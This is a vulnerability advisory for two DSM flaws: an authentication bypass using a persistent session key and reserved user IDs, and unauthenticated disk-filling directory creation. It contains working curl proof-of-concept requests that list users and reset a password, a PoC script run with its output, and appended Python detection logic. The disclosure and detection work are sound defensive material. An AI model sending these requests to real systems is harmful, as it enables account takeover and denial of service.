CVE-2025-43995: Authentication Bypass in DSM Data Collector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId.
It has been observed that the ApiSession identified by the integer key 1 is present in the "sessionHash" regardless of whether any user is currently logged into, or was ever previously logged into, the Web GUI of the application.
Additionally, it appears that there are some special users used in the application. These are masterUser (id 434223), rmsUser (id 434224), and smisUser (id 434225).
By specifying a <SessionKey>1</SessionKey> and <UserId>434223</UserId> in a SOAP message sent to endpoint /CompellentApiServices/CompellentAPIServices, the attacker can access (without authentication) a large set of APIs, including changing an existing DSM user's password.
Proof of Concept
# Get existing users
# - user id identified by InstanceId and user name by InstanceName
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>GetList</Command><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Instance(Id|Name)>.*?/Instance(Id|Name)>'
InstanceId>434226</InstanceId>
InstanceName>dsmuser</InstanceName>
# Change password for the user identified by the InstanceId 434226 to "Password123" (without quotes)
# - Modify <InstanceId> and <NewPassword> as needed
# - NOTE:
# --- NewPassword cannot be the same as the old one
# --- NewPassword may need to meet the password min/max length and/or complexity rules
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>ChangePassword</Command><Attributes><InstanceId>434226</InstanceId><NewPassword>Password123</NewPassword></Attributes><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Successful>.*/Successful>'
Successful>True</Successful>
CVE-2025-43994: Unauthenticated Large Directory Creation in DSM Server Agent (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
The DSM Server Agent allows an unauthenticated remote attacker to create a directory tree structure of attacker-specified size on the host running the agent. This could allow the attacker to fill up a disk drive, potentially leading to a denial of service (DoS).
Proof of Concept
python3 dsm_server_agent_create_space.py -t <target-host> -p 27355 -s 1000
Creating a directory tree of 1000 MB in C:\ on the remote host
Sending:
<em_sa_xml><Command>Create</Command><Arguments><DriveOrMountPoint>C:\</DriveOrMountPoint><FreePercent>0</FreePercent><SizeMB>1000</SizeMB></Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>
Received:
<em_sa_xml>
<BaseProcess>
<Index>638868988165592124</Index>
<ProcessName>[Process638868988165592124]CreateSpaceProcess</ProcessName>
<CurrentProgress>0</CurrentProgress>
<TotalProgress>10</TotalProgress>
<CurrentProgress2>0</CurrentProgress2>
<TotalProgress2>0</TotalProgress2>
<State>1</State>
<StateStr>NotStarted</StateStr>
<Message></Message>
<MessageId></MessageId>
<Message2Id></Message2Id>
<MessageParams></MessageParams>
<Message2Params></Message2Params>
</BaseProcess>
</em_sa_xml>
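As an added example that is not part of this advisory, the following Python detection logic flags inbound messages matching the two patterns described above: the reserved SessionKey/UserId combination on the ApiProxy SOAP endpoint (CVE-2025-43995) and an unauthenticated CreateSpace command to the Server Agent (CVE-2025-43994). The sample messages are constructed here to mirror the PoC traffic, not captured from a real host.

```python
import xml.etree.ElementTree as ET

# Identifiers taken from the advisory text
PERSISTENT_SESSION_KEY = "1"
RESERVED_USER_IDS = {"434223", "434224", "434225"}  # masterUser, rmsUser, smisUser
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
API_NS = "http://WebServer.WebServices.compellent.com/"


def inspect_api_proxy_request(soap_body: str) -> list[str]:
    """Return findings for a SOAP message sent to the ApiProxy endpoint."""
    findings = []
    root = ET.fromstring(soap_body)
    arg0 = root.find(f".//{{{API_NS}}}ApiCommand/arg0")
    if arg0 is None or not (arg0.text or "").strip():
        return findings
    # The real command is an inner <compapi> document carried as CDATA text.
    compapi = ET.fromstring(arg0.text)
    conn = compapi.find("ApiConnection")
    key = conn.findtext("SessionKey") if conn is not None else None
    uid = conn.findtext("UserId") if conn is not None else None
    if key == PERSISTENT_SESSION_KEY and uid in RESERVED_USER_IDS:
        findings.append(f"CVE-2025-43995 pattern: SessionKey={key} UserId={uid}")
        if compapi.findtext("Command") == "ChangePassword":
            findings.append("password change attempted via reserved session")
    return findings


def inspect_server_agent_request(em_sa_xml: str) -> list[str]:
    """Return findings for a message sent to the DSM Server Agent port (27355)."""
    root = ET.fromstring(em_sa_xml)
    if root.tag != "em_sa_xml":
        return []
    if root.findtext("ObjectType") == "CreateSpace" and root.findtext("Command") == "Create":
        size = root.findtext("Arguments/SizeMB") or "?"
        return [f"CVE-2025-43994 pattern: unauthenticated CreateSpace of {size} MB"]
    return []


# Constructed samples mirroring the PoC traffic (not captured from a real host)
SAMPLE_SOAP = (
    f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:web="{API_NS}">'
    "<soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA["
    "<compapi><Object>EmUser</Object><CommandType>Method</CommandType>"
    "<Command>ChangePassword</Command><ApiConnection><SessionKey>1</SessionKey>"
    "<UserId>434223</UserId></ApiConnection></compapi>]]></arg0>"
    "</web:ApiCommand></soapenv:Body></soapenv:Envelope>"
)
SAMPLE_AGENT = ("<em_sa_xml><Command>Create</Command><Arguments><SizeMB>1000</SizeMB>"
                "</Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>")

if __name__ == "__main__":
    for f in inspect_api_proxy_request(SAMPLE_SOAP) + inspect_server_agent_request(SAMPLE_AGENT):
        print("ALERT:", f)
```

Run the functions over decoded request bodies at a reverse proxy or from packet captures of TCP/3033 and TCP/27355; a hit on either pattern from an unknown source address warrants an immediate credential review on the affected DSM users.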